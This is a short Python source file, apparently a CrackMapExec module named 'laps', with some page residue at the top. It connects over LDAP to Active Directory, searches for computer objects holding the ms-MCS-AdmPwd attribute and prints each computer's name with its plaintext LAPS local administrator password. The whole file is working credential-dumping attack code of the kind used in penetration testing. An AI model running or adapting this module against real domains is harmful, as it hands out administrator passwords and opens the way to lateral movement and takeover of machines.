49 lines
1.7 KiB
Python
49 lines
1.7 KiB
Python
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
|
|
|
class CMEModule:
|
|
'''
|
|
Module by technobro refactored by @mpgn (now compatible with LDAP protocol + filter by computer)
|
|
|
|
Initial module:
|
|
@T3KX: https://github.com/T3KX/Crackmapexec-LAPS
|
|
|
|
Credit: @n00py1
|
|
Reference: https://www.n00py.io/2020/12/dumping-laps-passwords-from-linux/
|
|
https://github.com/n00py/LAPSDumper
|
|
'''
|
|
|
|
name = 'laps'
|
|
description = 'Retrieves the LAPS passwords'
|
|
supported_protocols = ['ldap']
|
|
opsec_safe = True
|
|
multiple_hosts = False
|
|
|
|
def options(self, context, module_options):
|
|
"""
|
|
COMPUTER Computer name or wildcard ex: WIN-S10, WIN-* etc. Default: *
|
|
"""
|
|
|
|
self.computer = "*"
|
|
if 'COMPUTER' in module_options:
|
|
self.computer = module_options['COMPUTER']
|
|
|
|
def on_login(self, context, connection):
|
|
|
|
context.log.info('Getting LAPS Passwords')
|
|
|
|
searchFilter = '(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(name='+ self.computer +'))'
|
|
attributes = ['ms-MCS-AdmPwd','samAccountname']
|
|
result = connection.search(searchFilter, attributes, 10000)
|
|
|
|
for item in result:
|
|
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
|
|
continue
|
|
msMCSAdmPwd = ''
|
|
sAMAccountName = ''
|
|
for computer in item['attributes']:
|
|
if str(computer['type']) == "sAMAccountName":
|
|
sAMAccountName = str(computer['vals'][0])
|
|
else:
|
|
msMCSAdmPwd = str(computer['vals'][0])
|
|
context.log.highlight("Computer: {:<20} Password: {}".format(sAMAccountName, msMCSAdmPwd))
|